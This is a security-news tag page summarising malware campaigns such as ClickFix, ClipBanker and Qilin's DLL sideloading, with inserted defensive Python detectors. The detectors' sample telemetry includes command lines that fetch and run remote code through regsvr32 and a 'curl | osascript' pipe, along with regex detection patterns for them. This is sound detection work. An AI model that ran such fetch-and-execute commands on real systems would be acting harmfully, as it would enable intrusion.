Tag: infection
-
Authorities Seize 106 Servers and 101 Domains in Major SocGholish Malware Takedown
Tags: cyber, cybercrime, exploit, group, infection, infrastructure, international, law, malware, russia
International law enforcement agencies have successfully seized 106 servers and 101 domains as part of a coordinated global effort against the SocGholish malware infrastructure, marking a major milestone in Operation Endgame. Announced on June 18, 2026, from The Hague, this operation targeted a crucial infection chain exploited by cybercriminal groups, including the infamous Russia-linked group…
-
Sapphire Sleet macOS Malware Abuses curl-to-osascript Execution for Multi-Stage Payload Delivery
Sapphire Sleet’s latest macOS campaign uses crafted .scpt AppleScript lures that pipe curl output directly to osascript, enabling a compact, multi-stage payload chain that executes entirely within Script Editor and evades many built-in macOS protections. The infection begins with a socially engineered lure: fake SDK or update AppleScript files such as Zoom SDK Update.scpt or…
-
Fileless Phantom Stealer Targets Browser Credentials
In addition to executing entirely in memory, the malware’s infection chain incorporates other anti-analysis techniques designed to frustrate detection. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/fileless-phantom-stealer-targets-browser-credentials
-
Miasma Worm Hits Microsoft’s AI Coding Ecosystem
Attackers Compromised More Than 70 Microsoft Repositories in Under 2 Minutes. Attackers linked to the Miasma supply-chain campaign compromised a Microsoft contributor account and pushed malicious code into more than 70 repositories, using artificial intelligence-assisted coding tools as an infection path to steal credentials and developer secrets at scale. First seen on govinfosecurity.com Jump to…
-
Malspam Campaign Abuses DoubleClick to Deploy Stealthy .NET Loader
A sophisticated new malspam campaign is actively exploiting Google’s DoubleClick ad-tracking infrastructure to bypass enterprise email security gateways. Discovered by researchers at Huntress, the attack utilizes highly personalized dynamic lures to initiate a complex, five-stage infection chain that actively dismantles local defenses before deploying process-hollowed payloads. The attack chain begins with a malicious HTML attachment,…
-
Hackers Use SEO Poisoning to Fake Gemini CLI, Claude Installers
Financially motivated threat actors are running an active campaign that impersonates Google’s Gemini CLI and Anthropic’s Claude Code, using SEO poisoning to deliver a fileless PowerShell infostealer to developer workstations worldwide. First identified in early March 2026 by EclecticIQ researchers, the campaign represents a calculated escalation in supply-chain-focused eCrime targeting AI developer tooling. The infection…
-
macOS Malware Abuses Fake Google Update for Persistence
A newly observed variant of the SHub macOS infostealer, dubbed “Reaper,” is expanding its capabilities with stealthier delivery, enhanced data theft, and a persistence mechanism disguised as a legitimate Google software update. The Reaper variant continues SHub’s use of fake application installers, notably masquerading as WeChat and Miro downloads. However, its infection chain stands out…
-
7 tips for accelerating cyber incident recovery
Tags: attack, awareness, backup, breach, business, ceo, cio, ciso, cloud, communications, control, cyber, cybersecurity, data, defense, finance, framework, governance, incident, incident response, infection, insurance, international, lessons-learned, malicious, malware, monitoring, nist, risk, service, technology, threat, update
Emphasize scoping and containment from the outset: Because you can’t recover from what you can’t stop, scoping and containment should be the absolute first priority during incident recovery, says Amit Basu, CIO and CISO at freight shipping firm International Seaway. “Before anything else, you must stop the bleeding,” he says. This means understanding the true scope…
-
JavaScript Malware Campaign Drops Crypto Clipper via PowerShell
A large-scale CountLoader campaign uses layered obfuscation, multi-stage payload delivery, and covert command-and-control (C2) communication to deploy cryptocurrency clipper malware. The campaign stands out for its complex infection chain, combining JavaScript, PowerShell, and in-memory shellcode execution to evade detection and maintain persistence across infected systems. The attack begins with a malicious executable that launches…
-
Google Launches Android Spyware Forensics Tool for High-Risk Users
Google’s Android Advanced Protection Mode is getting a new feature allowing trusted security experts to investigate potential spyware infections. First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/google-launches-android-spyware/
-
Worm Redux: Fresh Mini Shai-Hulud Infections Bite Supply Chain
Hundreds of npm packages infected by the self-propagating, credential-stealing worm from TeamPCP are related to the open source TanStack ecosystem. First seen on darkreading.com Jump to article: www.darkreading.com/application-security/worm-redux-fresh-mini-shai-hulud-infections-bite-supply-chain
-
New PCPJack worm steals credentials, cleans TeamPCP infections
A new malware framework called PCPJack is stealing credentials from exposed cloud infrastructure while actively removing TeamPCP’s access to the systems. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-pcpjack-worm-steals-credentials-cleans-teampcp-infections/
-
Fake Claude AI Installers Used to Spread Malware in New Cyber Scam
Hackers are abusing fake Claude AI installer pages promoted through Google Ads to trick users into running malware. The operation combines highly realistic install guides with a stealthy, multi-stage infection chain that abuses trusted Windows components, fileless execution, and advanced evasion techniques to stay under the radar. Victims who click these ads…
-
Widely used Daemon Tools disk app backdoored in monthlong supply-chain attack
Daemon Tools users: It’s time to check your machines for stealthy infections, stat. First seen on arstechnica.com Jump to article: arstechnica.com/security/2026/05/widely-used-daemon-tools-disk-app-backdoored-in-monthlong-supply-chain-attack/
-
Kaspersky suspects Chinese hackers planted a backdoor into Daemon Tools in ‘widespread’ attack
The cybersecurity company says it’s seen thousands of infection attempts, and at least a dozen successful hacks after users installed malicious versions of the popular Windows software. First seen on techcrunch.com Jump to article: techcrunch.com/2026/05/05/kaspersky-suspects-chinese-hackers-planted-a-backdoor-into-daemon-tools-in-widespread-attack/
-
Stealthy malware abuses Microsoft Phone Link to siphon SMS OTPs from enterprise PCs
Multi-stage infection chain: The intrusion begins with an unknown initial access vector, followed by the execution of a malicious file disguised as a ScreenConnect update, Talos said. The initial payload is a Rust-compiled loader using filenames such as “systemupdates.exe,” which drops a .NET loader disguised as a text file in a system directory, the post said. Persistence…
-
ClickFix Attack Swaps PowerShell for Cmdkey, Remote Regsvr32 Payloads
A newly identified ClickFix attack variant is raising concerns among cybersecurity researchers after it was observed replacing traditional PowerShell-based delivery with a stealthier technique leveraging native Windows utilities. The infection begins with a familiar ClickFix tactic: a phishing page disguised as a CAPTCHA verification prompt. Victims are instructed to press Win + R, paste a…
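Both the Sapphire Sleet item above (curl output piped into osascript) and this ClickFix variant (regsvr32 and cmdkey launched from the Run dialog) come down to native utilities being invoked in ways a process-creation feed can catch. The following detector is an added example for this page, not code from either article or any vendor; the event field names and the sample records are constructed, and the "osascript shelling out to curl" check is an assumed variant rather than something the article describes.

```python
import re
from dataclasses import dataclass

# Matches an http(s) URL anywhere in a command line.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Matches "curl ... | osascript" inside a shell command line.
CURL_TO_OSASCRIPT = re.compile(r"\bcurl\b.*\|\s*osascript\b")


@dataclass
class ProcEvent:
    """One process-creation record. Field names are an assumption modelled
    on Sysmon / EDR telemetry, not any vendor's schema."""
    host_os: str   # "windows" or "macos"
    parent: str    # parent process image name
    image: str     # created process image name
    cmdline: str   # full command line


def analyze(ev: ProcEvent) -> list[str]:
    """Return the suspicious patterns matched by one event (empty list if none)."""
    findings = []
    image, parent = ev.image.lower(), ev.parent.lower()
    if ev.host_os == "windows":
        # Squiblydoo-style: regsvr32 fetching a scriptlet or DLL over the network.
        if image == "regsvr32.exe" and REMOTE_URL.search(ev.cmdline):
            findings.append("regsvr32 loading a remote payload")
        # A Win+R launch shows up with explorer.exe as the parent. ClickFix pastes
        # its command there, so native utilities spawned this way are worth a look
        # even when the arguments are individually benign.
        if image in {"regsvr32.exe", "cmdkey.exe"} and parent == "explorer.exe":
            findings.append(f"{image} launched from the Run dialog")
    elif ev.host_os == "macos":
        if image in {"sh", "bash", "zsh"} and CURL_TO_OSASCRIPT.search(ev.cmdline):
            findings.append("curl output piped into osascript")
        # Assumed variant: an AppleScript run by osascript that itself shells
        # out to curl through `do shell script`.
        if image == "osascript" and "do shell script" in ev.cmdline and "curl" in ev.cmdline:
            findings.append("osascript shelling out to curl")
    return findings


# Constructed sample telemetry (hosts are RFC 5737 documentation addresses).
SAMPLE_EVENTS = [
    ProcEvent("windows", "explorer.exe", "regsvr32.exe",
              "regsvr32.exe /s /n /u /i:https://203.0.113.10/a.sct scrobj.dll"),
    ProcEvent("windows", "explorer.exe", "cmdkey.exe", "cmdkey /list"),
    ProcEvent("windows", "msiexec.exe", "regsvr32.exe",
              r"regsvr32.exe /s C:\Program Files\Vendor\lib.dll"),
    ProcEvent("macos", "Script Editor", "sh",
              "sh -c 'curl -fsSL https://203.0.113.20/s.txt | osascript'"),
    ProcEvent("macos", "launchd", "osascript",
              "osascript /Users/alice/Library/Scripts/backup.scpt"),
]


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index every event that produced at least one finding."""
    return [(i, f) for i, ev in enumerate(events) if (f := analyze(ev))]


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i].image, "->", "; ".join(findings))
```

The third Windows event (a vendor installer registering a local DLL) and the last macOS event (a scheduled AppleScript) are the benign controls: the Run-dialog parent and the remote URL are what separate the ClickFix pattern from ordinary regsvr32 use.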
-
Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener
Introduction: On March 12, 2026, Zscaler ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals. Our analysis of this sample uncovered a campaign leveraging a multi-stage attack chain where a trojanized SumatraPDF reader deploys an AdaptixC2 Beacon agent, ultimately leading to the download and abuse of Visual Studio (VS) Code tunnels for…
-
DPRK Fake Job Scams Self-Propagate in ‘Contagious Interview’
A compromised developer’s repository serves as a worm-like infection vector to spread remote access Trojans (RATs) and other malware. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/dprk-fake-job-scams-self-propagate-contagious-interview
-
The Gentlemen Ransomware Expands With Rapid Affiliate Growth
Gentlemen RaaS expands quickly with multi-platform attacks and SystemBC-linked infections. First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/gentlemen-ransomware-rapid/
-
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 93
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: CPU-Z / HWMonitor watering hole infection: a copy-pasted attack; Fake Claude site installs malware that gives attackers access to your computer; Malware Analysis Static SKILL for Codex; JanelaRAT: a financial threat targeting users in Latin […]…
-
Weaponized CVE-2026-39987 Pushes Blockchain Backdoor Through Hugging Face
Tags: backdoor, blockchain, credentials, cve, cyber, exploit, infection, rce, remote-code-execution, theft
Attackers are rapidly exploiting CVE-2026-39987 in the marimo Python notebook platform to deploy a new NKAbuse backdoor variant hosted on Hugging Face Spaces, turning AI/ML developer environments into high-value infection points. The campaign combines pre-auth RCE, credential theft, lateral movement to PostgreSQL and Redis, and a blockchain-based C2 channel that is difficult to monitor or…
-
PlugX USB Worm Hits Multiple Continents via DLL Sideloading
A new PlugX USB worm variant is driving fresh infection waves across several continents, using DLL sideloading and stealthy USB-based propagation to evade detection. First observed in Papua New Guinea in August 2022, the same strain resurfaced months later not only in the Pacific Rim but also in Ghana, Mongolia, Zimbabwe, and Nigeria, underscoring a…
-
Fake Proxifier GitHub Installer Spreads ClipBanker Crypto Malware
Hackers are abusing a fake Proxifier installer hosted on GitHub to deliver a multi-stage ClipBanker malware that silently hijacks cryptocurrency transactions from infected systems. The campaign combines search-engine poisoning, trojanized installers, and fileless techniques to stay under the radar while swapping victims’ wallet addresses with those controlled by attackers. The infection typically begins when users…
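The clipper behaviour described here has a simple observable signature: the text the user selected and the text the clipboard holds at paste time are both wallet addresses of the same kind, but they differ. The check below is an added example for this page, not code from the article or from any research team; the copy/paste event pairs are constructed, and the address patterns are loose syntactic matches (no checksum validation) that are this example's own assumption.

```python
import re
from typing import Optional

# Loose syntactic checks, enough to tell a wallet address from ordinary text.
# A clipper does not need valid-checksum decoys to succeed, so checksums are
# deliberately not validated here; the signal is the kind-preserving swap.
ADDRESS_KINDS = {
    "btc-bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_kind(text: str) -> Optional[str]:
    """Return which address family `text` looks like, or None for other text."""
    t = text.strip()
    for kind, pattern in ADDRESS_KINDS.items():
        if pattern.match(t):
            return kind
    return None


def detect_swap(copied: str, on_clipboard: str) -> Optional[dict]:
    """copied: what the user actually selected; on_clipboard: what the clipboard
    holds when they paste. Flags only the clipper pattern: same address kind,
    different value. Unchanged addresses and non-address text are ignored."""
    k_before, k_after = address_kind(copied), address_kind(on_clipboard)
    if k_before and k_before == k_after and copied.strip() != on_clipboard.strip():
        return {"kind": k_before, "copied": copied.strip(), "pasted": on_clipboard.strip()}
    return None


def replay(events: list[tuple[str, str]]) -> list[dict]:
    """Run detect_swap over recorded (copied, on_clipboard) pairs."""
    return [hit for copied, now in events if (hit := detect_swap(copied, now))]


# Constructed sample: the user's own address, an attacker-controlled
# substitute, one untouched BIP173 example address, and plain text.
USER_ETH = "0x1234567890abcdef1234567890abcdef12345678"
ATTACKER_ETH = "0x" + "deadbeef" * 5
USER_BTC = "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"

SAMPLE_EVENTS = [
    (USER_ETH, ATTACKER_ETH),          # swapped: flagged
    (USER_BTC, USER_BTC),              # unchanged: ignored
    ("meeting at 3pm", "meeting at 3pm"),  # not an address: ignored
    (USER_ETH, "see attached"),        # kind changed, not a clipper pattern: ignored
]

if __name__ == "__main__":
    for hit in replay(SAMPLE_EVENTS):
        print(f"{hit['kind']}: copied {hit['copied']} but clipboard now holds {hit['pasted']}")
```

On a real endpoint the "copied" side comes from the selection or from the clipboard value captured immediately after the copy; comparing it against the value read just before a paste into a wallet or exchange form is what surfaces the substitution.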
-
Qilin Ransomware Deploys Malicious DLL to Disable Most EDR Defenses
The Qilin ransomware group has developed a highly sophisticated infection chain that targets and disables over 300 endpoint detection and response (EDR) solutions. As defenders improve behavioral detection capabilities, attackers are increasingly targeting the defense layer itself during the early stages of a breach. By deploying a malicious “msimg32.dll” file, attackers can bypass traditional antivirus…
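A malicious msimg32.dll only works if an executable in the same folder loads it ahead of the genuine copy in System32, which gives a hunting check: look for system DLL names sitting outside System32 with a different hash, and note which executable shares their folder. The script below is an added example for this page and is not the article's or any vendor's tooling; the file listing and contents are constructed, and the watched names other than msimg32.dll are this example's own illustrative additions.

```python
import hashlib
from pathlib import PureWindowsPath

SYSTEM32 = r"c:\windows\system32"

# DLL names that normally live only in System32 and are common sideloading
# targets. msimg32.dll is the one named in the article; the others are
# illustrative assumptions.
WATCHED = {"msimg32.dll", "version.dll", "dbghelp.dll"}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _parent(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def find_sideload_candidates(files: dict[str, bytes]) -> list[dict]:
    """`files` maps full path -> file content (on a real host, read from disk).
    Returns one record per watched DLL name found outside System32 whose hash
    differs from the System32 copy, or that has no System32 copy at all, and
    lists any .exe sharing its folder (the likely sideloading host)."""
    reference = {}
    for path, data in files.items():
        name = PureWindowsPath(path).name.lower()
        if _parent(path) == SYSTEM32 and name in WATCHED:
            reference[name] = sha256(data)

    hits = []
    for path, data in files.items():
        name = PureWindowsPath(path).name.lower()
        if name not in WATCHED or _parent(path) == SYSTEM32:
            continue
        digest = sha256(data)
        if digest == reference.get(name):
            continue  # byte-identical redistribution of the system DLL; not a hijack
        host_exe = sorted(
            PureWindowsPath(q).name for q in files
            if _parent(q) == _parent(path) and q.lower().endswith(".exe"))
        hits.append({
            "path": path,
            "sha256": digest,
            "reason": "differs from System32 copy" if name in reference else "no System32 reference",
            "host_exe": host_exe,
        })
    return hits


# Constructed file listing: contents are placeholders, not real binaries.
SAMPLE_FILES = {
    r"C:\Windows\System32\msimg32.dll": b"genuine msimg32 (constructed)",
    r"C:\Windows\System32\version.dll": b"genuine version (constructed)",
    r"C:\ProgramData\Updater\updater.exe": b"signed host exe (constructed)",
    r"C:\ProgramData\Updater\msimg32.dll": b"attacker msimg32 (constructed)",
    r"C:\Program Files\Vendor\app.exe": b"vendor app (constructed)",
    r"C:\Program Files\Vendor\version.dll": b"genuine version (constructed)",
    r"C:\Users\Public\Tools\dbghelp.dll": b"unknown dbghelp (constructed)",
}

if __name__ == "__main__":
    for hit in find_sideload_candidates(SAMPLE_FILES):
        print(hit["path"], hit["reason"], "host:", hit["host_exe"] or "-")
```

The vendor folder's version.dll is byte-identical to the System32 copy and is skipped; the Updater folder's msimg32.dll differs and sits next to an executable, which is the shape of the Qilin chain described above. A differing hash is not proof on its own (legitimate redistributed copies can be a different build), so the next step is checking the file's signature and the signer of the host executable.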
-
Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials
A large-scale credential harvesting operation has been observed exploiting the React2Shell vulnerability as an initial infection vector to steal database credentials, SSH private keys, Amazon Web Services (AWS) secrets, shell command history, Stripe API keys, and GitHub tokens at scale.Cisco Talos has attributed the operation to a threat cluster it tracks as First seen on…
-
Researchers Uncover Mining Operation Using ISO Lures to Spread RATs and Crypto Miners
A financially motivated operation codenamed REF1695 has been observed leveraging fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023.”Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration,” Elastic First seen on thehackernews.com Jump to…

